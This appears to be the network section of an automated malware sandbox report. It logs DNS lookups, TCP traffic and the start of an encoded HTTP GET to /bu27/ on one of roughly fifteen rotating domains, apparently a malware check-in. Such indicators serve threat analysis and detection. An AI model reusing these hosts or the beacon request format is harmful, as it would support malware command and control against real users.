                                                                                                                                                                          Oct 23, 2024 17:15:44.476680040 CEST5002480192.168.2.5216.40.34.41
                                                                                                                                                                          Oct 23, 2024 17:15:44.539202929 CEST5002480192.168.2.5216.40.34.41
                                                                                                                                                                          Oct 23, 2024 17:15:44.544642925 CEST8050024216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:44.545106888 CEST8050024216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:45.177743912 CEST8050024216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:45.177767038 CEST8050024216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:45.177778959 CEST8050024216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:45.177789927 CEST8050024216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:45.177802086 CEST8050024216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:45.177814007 CEST8050024216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:45.177825928 CEST8050024216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:45.177839041 CEST8050024216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:45.177834988 CEST5002480192.168.2.5216.40.34.41
                                                                                                                                                                          Oct 23, 2024 17:15:45.177853107 CEST8050024216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:45.177881956 CEST5002480192.168.2.5216.40.34.41
                                                                                                                                                                          Oct 23, 2024 17:15:45.178498983 CEST8050024216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:45.178536892 CEST5002480192.168.2.5216.40.34.41
                                                                                                                                                                          Oct 23, 2024 17:15:45.184323072 CEST8050024216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:45.184341908 CEST8050024216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:45.184396029 CEST5002480192.168.2.5216.40.34.41
                                                                                                                                                                          Oct 23, 2024 17:15:45.218005896 CEST8050024216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:45.218786955 CEST8050024216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:45.218837023 CEST5002480192.168.2.5216.40.34.41
                                                                                                                                                                          Oct 23, 2024 17:15:45.294435024 CEST8050024216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:45.294452906 CEST8050024216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:45.294465065 CEST8050024216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:45.294476032 CEST8050024216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:45.294542074 CEST5002480192.168.2.5216.40.34.41
                                                                                                                                                                          Oct 23, 2024 17:15:45.294755936 CEST8050024216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:45.294804096 CEST5002480192.168.2.5216.40.34.41
                                                                                                                                                                          Oct 23, 2024 17:15:46.052233934 CEST5002480192.168.2.5216.40.34.41
                                                                                                                                                                          Oct 23, 2024 17:15:47.075692892 CEST5002580192.168.2.5216.40.34.41
                                                                                                                                                                          Oct 23, 2024 17:15:47.082621098 CEST8050025216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:47.082690954 CEST5002580192.168.2.5216.40.34.41
                                                                                                                                                                          Oct 23, 2024 17:15:47.096137047 CEST5002580192.168.2.5216.40.34.41
                                                                                                                                                                          Oct 23, 2024 17:15:47.103064060 CEST8050025216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:47.766477108 CEST8050025216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:47.766504049 CEST8050025216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:47.766515017 CEST8050025216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:47.766587019 CEST8050025216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:47.766601086 CEST8050025216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:47.766614914 CEST8050025216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:47.766624928 CEST8050025216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:47.766910076 CEST5002580192.168.2.5216.40.34.41
                                                                                                                                                                          Oct 23, 2024 17:15:47.766911030 CEST5002580192.168.2.5216.40.34.41
                                                                                                                                                                          Oct 23, 2024 17:15:47.804877043 CEST8050025216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:47.808443069 CEST5002580192.168.2.5216.40.34.41
                                                                                                                                                                          Oct 23, 2024 17:15:47.808444023 CEST5002580192.168.2.5216.40.34.41
                                                                                                                                                                          Oct 23, 2024 17:15:47.813822031 CEST8050025216.40.34.41192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:52.935893059 CEST5002680192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:15:52.941349983 CEST805002637.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:52.941420078 CEST5002680192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:15:52.953013897 CEST5002680192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:15:52.958359003 CEST805002637.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:53.968419075 CEST805002637.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:53.968452930 CEST805002637.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:53.968465090 CEST805002637.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:53.968475103 CEST805002637.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:53.968503952 CEST805002637.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:53.968528032 CEST5002680192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:15:53.968579054 CEST5002680192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:15:53.995378017 CEST805002637.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:53.995492935 CEST5002680192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:15:54.458285093 CEST5002680192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:15:55.477232933 CEST5002780192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:15:55.482973099 CEST805002737.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:55.486331940 CEST5002780192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:15:55.497889996 CEST5002780192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:15:55.503617048 CEST805002737.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:56.391896009 CEST805002737.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:56.391921997 CEST805002737.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:56.391941071 CEST805002737.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:56.391951084 CEST805002737.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:56.391966105 CEST5002780192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:15:56.392004013 CEST5002780192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:15:56.531966925 CEST805002737.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:56.532074928 CEST5002780192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:15:57.005150080 CEST5002780192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:15:58.026837111 CEST5002880192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:15:58.032406092 CEST805002837.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:58.032705069 CEST5002880192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:15:58.043466091 CEST5002880192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:15:58.048908949 CEST805002837.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:58.048938990 CEST805002837.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:58.936841011 CEST805002837.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:58.936898947 CEST805002837.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:58.937014103 CEST5002880192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:15:58.937541962 CEST805002837.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:58.937555075 CEST805002837.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:58.937654018 CEST5002880192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:15:59.077112913 CEST805002837.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:59.077169895 CEST5002880192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:15:59.551983118 CEST5002880192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:16:00.570609093 CEST5002980192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:16:00.576287985 CEST805002937.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:00.576364994 CEST5002980192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:16:00.583548069 CEST5002980192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:16:00.588907957 CEST805002937.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:01.479159117 CEST805002937.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:01.479203939 CEST805002937.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:01.479216099 CEST805002937.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:01.479250908 CEST805002937.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:01.479264021 CEST805002937.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:01.479276896 CEST805002937.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:01.479296923 CEST805002937.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:01.479304075 CEST5002980192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:16:01.479373932 CEST5002980192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:16:01.479386091 CEST805002937.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:01.479398012 CEST805002937.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:01.479409933 CEST805002937.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:01.479427099 CEST5002980192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:16:01.479441881 CEST5002980192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:16:01.484754086 CEST805002937.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:01.484791040 CEST805002937.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:01.484802008 CEST805002937.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:01.484812975 CEST805002937.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:01.484884024 CEST5002980192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:16:01.619004965 CEST805002937.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:01.619075060 CEST805002937.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:01.619170904 CEST5002980192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:16:01.619296074 CEST805002937.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:01.619339943 CEST805002937.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:01.619405031 CEST5002980192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:16:01.623785019 CEST805002937.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:01.623826027 CEST805002937.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:01.623840094 CEST805002937.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:01.623892069 CEST5002980192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:16:01.633697033 CEST805002937.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:01.635853052 CEST5002980192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:16:01.773643970 CEST805002937.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:01.773757935 CEST5002980192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:16:01.787683964 CEST5002980192.168.2.537.9.175.196
                                                                                                                                                                          Oct 23, 2024 17:16:01.793195963 CEST805002937.9.175.196192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:06.837497950 CEST5003080192.168.2.581.169.145.95
                                                                                                                                                                          Oct 23, 2024 17:16:06.842904091 CEST805003081.169.145.95192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:06.843657970 CEST5003080192.168.2.581.169.145.95
                                                                                                                                                                          Oct 23, 2024 17:16:06.858081102 CEST5003080192.168.2.581.169.145.95
                                                                                                                                                                          Oct 23, 2024 17:16:06.863514900 CEST805003081.169.145.95192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:07.693495035 CEST805003081.169.145.95192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:07.744132042 CEST5003080192.168.2.581.169.145.95
                                                                                                                                                                          Oct 23, 2024 17:16:07.818455935 CEST805003081.169.145.95192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:07.818581104 CEST5003080192.168.2.581.169.145.95
                                                                                                                                                                          Oct 23, 2024 17:16:08.364558935 CEST5003080192.168.2.581.169.145.95
                                                                                                                                                                          Oct 23, 2024 17:16:09.383109093 CEST5003180192.168.2.581.169.145.95
                                                                                                                                                                          Oct 23, 2024 17:16:09.388571978 CEST805003181.169.145.95192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:09.388658047 CEST5003180192.168.2.581.169.145.95
                                                                                                                                                                          Oct 23, 2024 17:16:09.399207115 CEST5003180192.168.2.581.169.145.95
                                                                                                                                                                          Oct 23, 2024 17:16:09.404547930 CEST805003181.169.145.95192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:10.242563963 CEST805003181.169.145.95192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:10.286417007 CEST5003180192.168.2.581.169.145.95
                                                                                                                                                                          Oct 23, 2024 17:16:10.380614042 CEST805003181.169.145.95192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:10.381092072 CEST5003180192.168.2.581.169.145.95
                                                                                                                                                                          Oct 23, 2024 17:16:11.255239010 CEST5003180192.168.2.581.169.145.95
                                                                                                                                                                          Oct 23, 2024 17:16:12.273823977 CEST5003280192.168.2.581.169.145.95
                                                                                                                                                                          Oct 23, 2024 17:16:12.279395103 CEST805003281.169.145.95192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:12.279829979 CEST5003280192.168.2.581.169.145.95
                                                                                                                                                                          Oct 23, 2024 17:16:12.290148020 CEST5003280192.168.2.581.169.145.95
                                                                                                                                                                          Oct 23, 2024 17:16:12.295708895 CEST805003281.169.145.95192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:12.295816898 CEST805003281.169.145.95192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:13.336780071 CEST805003281.169.145.95192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:13.338053942 CEST805003281.169.145.95192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:13.338128090 CEST5003280192.168.2.581.169.145.95
                                                                                                                                                                          Oct 23, 2024 17:16:13.338289976 CEST805003281.169.145.95192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:13.338352919 CEST5003280192.168.2.581.169.145.95
                                                                                                                                                                          Oct 23, 2024 17:16:13.802062035 CEST5003280192.168.2.581.169.145.95
                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                          Oct 23, 2024 17:12:47.423290014 CEST5153753192.168.2.51.1.1.1
                                                                                                                                                                          Oct 23, 2024 17:12:47.934143066 CEST53515371.1.1.1192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:06.587229013 CEST6474853192.168.2.51.1.1.1
                                                                                                                                                                          Oct 23, 2024 17:13:06.607225895 CEST53647481.1.1.1192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:20.431005955 CEST5319053192.168.2.51.1.1.1
                                                                                                                                                                          Oct 23, 2024 17:13:20.443113089 CEST53531901.1.1.1192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:34.102788925 CEST5761353192.168.2.51.1.1.1
                                                                                                                                                                          Oct 23, 2024 17:13:34.131566048 CEST53576131.1.1.1192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:47.762267113 CEST5406653192.168.2.51.1.1.1
                                                                                                                                                                          Oct 23, 2024 17:13:47.793904066 CEST53540661.1.1.1192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:01.212248087 CEST5464953192.168.2.51.1.1.1
                                                                                                                                                                          Oct 23, 2024 17:14:01.380120039 CEST53546491.1.1.1192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:14.697206020 CEST5110353192.168.2.51.1.1.1
                                                                                                                                                                          Oct 23, 2024 17:14:14.717761993 CEST53511031.1.1.1192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:29.103506088 CEST5634453192.168.2.51.1.1.1
                                                                                                                                                                          Oct 23, 2024 17:14:29.730338097 CEST53563441.1.1.1192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:43.774511099 CEST6431153192.168.2.51.1.1.1
                                                                                                                                                                          Oct 23, 2024 17:14:43.803853035 CEST53643111.1.1.1192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:57.509366989 CEST5051353192.168.2.51.1.1.1
                                                                                                                                                                          Oct 23, 2024 17:14:57.520889997 CEST53505131.1.1.1192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:11.321299076 CEST5433753192.168.2.51.1.1.1
                                                                                                                                                                          Oct 23, 2024 17:15:11.335381985 CEST53543371.1.1.1192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:25.352514982 CEST6399353192.168.2.51.1.1.1
                                                                                                                                                                          Oct 23, 2024 17:15:25.408235073 CEST53639931.1.1.1192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:39.043342113 CEST6006353192.168.2.51.1.1.1
                                                                                                                                                                          Oct 23, 2024 17:15:39.331513882 CEST53600631.1.1.1192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:15:52.821729898 CEST5325053192.168.2.51.1.1.1
                                                                                                                                                                          Oct 23, 2024 17:15:52.933053017 CEST53532501.1.1.1192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:16:06.806039095 CEST5504853192.168.2.51.1.1.1
                                                                                                                                                                          Oct 23, 2024 17:16:06.834686041 CEST53550481.1.1.1192.168.2.5
                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                          Oct 23, 2024 17:12:47.423290014 CEST192.168.2.51.1.1.10x6c07Standard query (0)www.refs4refs.infoA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:13:06.587229013 CEST192.168.2.51.1.1.10x9145Standard query (0)www.femaled.infoA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:13:20.431005955 CEST192.168.2.51.1.1.10x11e2Standard query (0)www.digitaladpro.shopA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:13:34.102788925 CEST192.168.2.51.1.1.10x86edStandard query (0)www.astrext.infoA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:13:47.762267113 CEST192.168.2.51.1.1.10x7290Standard query (0)www.nexari.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:14:01.212248087 CEST192.168.2.51.1.1.10x47c9Standard query (0)www.starseedtechs.netA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:14:14.697206020 CEST192.168.2.51.1.1.10xa422Standard query (0)www.dorabox.orgA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:14:29.103506088 CEST192.168.2.51.1.1.10x88c3Standard query (0)www.lpskfz.topA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:14:43.774511099 CEST192.168.2.51.1.1.10x6cd3Standard query (0)www.7wkto5nk230724z.clickA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:14:57.509366989 CEST192.168.2.51.1.1.10x83a5Standard query (0)www.2925588.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:15:11.321299076 CEST192.168.2.51.1.1.10x763bStandard query (0)www.onlinesbi.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:15:25.352514982 CEST192.168.2.51.1.1.10x3b5bStandard query (0)www.stoff-tanz.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:15:39.043342113 CEST192.168.2.51.1.1.10x9f74Standard query (0)www.newhopetoday.appA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:15:52.821729898 CEST192.168.2.51.1.1.10xa328Standard query (0)www.rvmsensors.netA (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:16:06.806039095 CEST192.168.2.51.1.1.10x4cecStandard query (0)www.treatyourownhip.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                          Oct 23, 2024 17:12:47.934143066 CEST1.1.1.1192.168.2.50x6c07No error (0)www.refs4refs.inforefs4refs.infoCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:12:47.934143066 CEST1.1.1.1192.168.2.50x6c07No error (0)refs4refs.info3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:12:47.934143066 CEST1.1.1.1192.168.2.50x6c07No error (0)refs4refs.info15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:13:06.607225895 CEST1.1.1.1192.168.2.50x9145No error (0)www.femaled.infoghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:13:06.607225895 CEST1.1.1.1192.168.2.50x9145No error (0)ghs.googlehosted.com142.250.186.115A (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:13:20.443113089 CEST1.1.1.1192.168.2.50x11e2No error (0)www.digitaladpro.shopghs.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:13:20.443113089 CEST1.1.1.1192.168.2.50x11e2No error (0)ghs.google.com142.250.184.211A (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:13:34.131566048 CEST1.1.1.1192.168.2.50x86edNo error (0)www.astrext.info217.160.0.132A (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:13:47.793904066 CEST1.1.1.1192.168.2.50x7290No error (0)www.nexari.xyz162.0.211.143A (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:14:01.380120039 CEST1.1.1.1192.168.2.50x47c9No error (0)www.starseedtechs.netstarseedtechs.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:14:01.380120039 CEST1.1.1.1192.168.2.50x47c9No error (0)starseedtechs.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:14:01.380120039 CEST1.1.1.1192.168.2.50x47c9No error (0)starseedtechs.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:14:14.717761993 CEST1.1.1.1192.168.2.50xa422No error (0)www.dorabox.orgdorabox.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:14:14.717761993 CEST1.1.1.1192.168.2.50xa422No error (0)dorabox.org3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:14:14.717761993 CEST1.1.1.1192.168.2.50xa422No error (0)dorabox.org15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:14:29.730338097 CEST1.1.1.1192.168.2.50x88c3No error (0)www.lpskfz.top206.238.184.168A (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:14:43.803853035 CEST1.1.1.1192.168.2.50x6cd3No error (0)www.7wkto5nk230724z.click104.21.3.193A (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:14:43.803853035 CEST1.1.1.1192.168.2.50x6cd3No error (0)www.7wkto5nk230724z.click172.67.131.32A (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:14:57.520889997 CEST1.1.1.1192.168.2.50x83a5No error (0)www.2925588.com103.71.154.12A (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:15:11.335381985 CEST1.1.1.1192.168.2.50x763bNo error (0)www.onlinesbi.xyzonlinesbi.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:15:11.335381985 CEST1.1.1.1192.168.2.50x763bNo error (0)onlinesbi.xyz3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:15:11.335381985 CEST1.1.1.1192.168.2.50x763bNo error (0)onlinesbi.xyz15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:15:25.408235073 CEST1.1.1.1192.168.2.50x3b5bNo error (0)www.stoff-tanz.onlinestoff-tanz.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:15:25.408235073 CEST1.1.1.1192.168.2.50x3b5bNo error (0)stoff-tanz.online84.32.84.32A (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:15:39.331513882 CEST1.1.1.1192.168.2.50x9f74No error (0)www.newhopetoday.app216.40.34.41A (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:15:52.933053017 CEST1.1.1.1192.168.2.50xa328No error (0)www.rvmsensors.net37.9.175.196A (IP address)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:16:06.834686041 CEST1.1.1.1192.168.2.50x4cecNo error (0)www.treatyourownhip.onlinetreatyourownhip.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Oct 23, 2024 17:16:06.834686041 CEST1.1.1.1192.168.2.50x4cecNo error (0)treatyourownhip.online81.169.145.95A (IP address)IN (0x0001)false
                                                                                                                                                                          • www.refs4refs.info
                                                                                                                                                                          • www.femaled.info
                                                                                                                                                                          • www.digitaladpro.shop
                                                                                                                                                                          • www.astrext.info
                                                                                                                                                                          • www.nexari.xyz
                                                                                                                                                                          • www.starseedtechs.net
                                                                                                                                                                          • www.dorabox.org
                                                                                                                                                                          • www.lpskfz.top
                                                                                                                                                                          • www.7wkto5nk230724z.click
                                                                                                                                                                          • www.2925588.com
                                                                                                                                                                          • www.onlinesbi.xyz
                                                                                                                                                                          • www.stoff-tanz.online
                                                                                                                                                                          • www.newhopetoday.app
                                                                                                                                                                          • www.rvmsensors.net
                                                                                                                                                                          • www.treatyourownhip.online
                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          0192.168.2.5498143.33.130.190802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:12:47.959638119 CEST522OUTGET /bu27/?1BSHu=OBVxGh8PUTflSv4p&9X=arK7OIHQWHgtDh1sf3kI8J+cFmR/JkLbUgiPCIgJ4c+wocF+yDjQeqOS9t2GatOOF1cc3WLgy0tHiTOMZdFQznjBMcPan8e4q4HEgkesUNBGloCBbuoZKCUD7zaLk7kfsg== HTTP/1.1
                                                                                                                                                                          Host: www.refs4refs.info
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Oct 23, 2024 17:12:51.543231010 CEST413INHTTP/1.1 200 OK
                                                                                                                                                                          Server: openresty
